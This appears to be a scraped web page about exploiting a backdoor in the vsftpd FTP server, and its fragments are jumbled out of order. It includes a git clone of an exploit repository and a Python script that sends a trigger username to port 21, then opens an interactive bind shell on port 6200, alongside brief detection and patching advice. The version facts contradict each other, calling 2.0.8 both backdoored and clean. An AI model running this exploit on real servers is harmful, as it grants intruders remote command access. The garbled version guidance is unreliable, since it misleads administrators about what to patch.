git clone https://github.com/ACinonyx/vsftpd-2.0.8-exploit.git cd vsftpd-2.0.8-exploit Never run an exploit without reading it first. Here is a simplified, annotated version of a typical exploit.py :
python exploit.py 192.168.1.100 If successful, you’ll see:
#!/usr/bin/python import socket import sys if len(sys.argv) != 2: print("Usage: %s <target_ip>" % (sys.argv[0])) sys.exit(1) vsftpd 208 exploit github install
You can clone a typical repository:
If you are a security researcher, use these GitHub scripts only in isolated labs. If you are a system administrator, check your vsftpd version today. If you see 2.0.8, patch immediately. git clone https://github
netstat -tulpn | grep 6200 If you see a process listening on 6200, your server has been exploited. Kill the process and investigate. Block outbound connections from your FTP server to unusual ports:
sudo yum update vsftpd The clean version is 2.0.8 (re-release) or any version > 2.0.8, like 2.0.9, 3.0.0, etc. Run a netstat to see if port 6200 is listening: If you see 2
target = sys.argv[1] print("[+] Connecting to FTP on %s:21" % target) ftp = socket.socket(socket.AF_INET, socket.SOCK_STREAM) ftp.connect((target, 21)) banner = ftp.recv(1024) print("[+] Banner: %s" % banner.strip()) Send the malicious username ftp.send("USER backdoor:)\r\n") ftp.close() Stage 2: Connect to the bind shell on port 6200 print("[+] Trigger sent. Connecting to shell on %s:6200" % target) shell = socket.socket(socket.AF_INET, socket.SOCK_STREAM) shell.connect((target, 6200)) print("[+] Shell obtained!\n") Stage 3: Interactive communication while True: cmd = raw_input("Shell# ") if cmd == "exit": break shell.send(cmd + "\n") response = shell.recv(1024) print(response) Step 3: Installing Dependencies Most Python-based scripts have no dependencies beyond the standard library ( socket , sys , time ). However, some advanced scripts use paramiko or pexpect . Install them via pip if needed: